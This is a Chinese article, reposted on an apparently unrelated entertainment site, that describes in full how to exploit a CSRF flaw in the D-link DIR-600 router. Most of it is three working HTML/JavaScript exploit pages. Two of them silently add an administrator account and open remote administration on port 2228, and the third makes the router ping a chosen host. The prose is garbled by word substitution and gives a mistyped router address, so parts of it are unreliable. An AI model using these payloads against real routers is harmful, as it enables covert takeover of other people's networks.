运用CSRF缝隙进犯D-link路由器全过程头条 - 超凡娱乐

运用CSRF缝隙进犯D-link路由器全过程头条

2019-02-14 09:36:40 | 作者: 寻春 | 标签: 缝隙,路由器,办理 | 浏览: 1177

1,介绍

本文的意图是展现CSRF缝隙的损害,以D-link的DIR-600路由器(硬件版别:BX,固件版别:2.16)的CSRF缝隙为例。
D-link的CSRF缝隙已经是揭露的,本文将详细描述一下整个D-link CSRF缝隙的使用,怎么经过CSRF缝隙完结远程办理拜访D-link路由器。

2,CSRF缝隙阐明

假如某些request恳求中没有csrf  token或不需求暗码授权,会存在CSRF缝隙,该缝隙答应攻击者假造登录用户发送恳求,因而能够导致用户履行攻击者想要的操作恳求。
经过D-link 办理面板的CSRF缝隙,攻击者能够做以下操作:

@1,增加一个新的办理帐号;
@2,启用路由器的远程办理;
@3,ping特定的机器;此操作只需求登录路由器就能够完结,需求知道路由器的WAN IP地址。

3,PART1:给路由器增加一个新的办理帐号

需求两个request恳求来完结

REQUEST1:

仿制代码代码如下:<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://192.168.0.1/hedwig.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "text/plain; charset=UTF-8");
xhr.withCredentials = "true";
var body = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>"+
"
<postxml>"+
"<module>"+
"<service>DEVICE.ACCOUNT</service>"+
"<device>"+
"<account>"+
"<seqno/>"+
"<max>1</max>"+
"<count>2</count>"+
"<entry>"+
"<name>admin</name>"+
"
<password>OoXxGgYy</password>"+
"<group>0</group>"+
"<description/>"+
"</entry>"+
"<entry>"+
"<name>admin2</name>"+
"
<password>pass2</password>"+
"<group>0</group>"+
"<description/>"+
"</entry>"+
"</account>"+
"<session>"+
"<captcha>0</captcha>"+
"<dummy/>"+
"<timeout>180</timeout>"+
"<maxsession>128</maxsession>"+
"<maxauthorized>16</maxauthorized>"+
"</session>"+
"</device>"+
"</module>"+
"<module>"+
"<service>HTTP.WAN-1</service>"+
"<inf>"+
"<web>2228</web>"+
"<weballow>"+
"<hostv4ip/>"+
"</weballow>"+
"</inf>"+
"</module>"+
"<module>"+
"<service>HTTP.WAN-2</service>"+
"<inf>"+
"<web>2228</web>"+
"<weballow>"+
"<hostv4ip/>"+
"</weballow>"+
"</inf>"+
"</module>"+
"</postxml>";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request1" onclick="submitRequest();" />
</form>
</body>
</html>
REQUEST2:

仿制代码代码如下:<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://192.168.0.1/pigwidgeon.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body = "ACTIONS=SETCFG%2CSAVE%2CACTIVATE";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request2" onclick="submitRequest();" />
</form>
</body>
</html>
REQUEST1和REQUEST2中,默许的路由局域网IP地址是192.198.0.1,办理帐号是admin,REQUEST1中的request恳求中,当暗码字段为OoXxGgYy的时分,是不会修正admin帐号的暗码的。这两个恳求完结了办理帐号admin2的增加,一起启用了远程办理端口2228.

PART2:ping特定的主机

REQUEST3:

仿制代码代码如下:<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://192.168.0.1/diagnostic.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body = "act=ping&dst=X.Y.Z.W";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request3" onclick="submitRequest();" />
</form>
</body>
</html>
只需求求该代码中的X.Y.Z.W为你需求ping的主机IP地址就能够。

版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表超凡娱乐立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章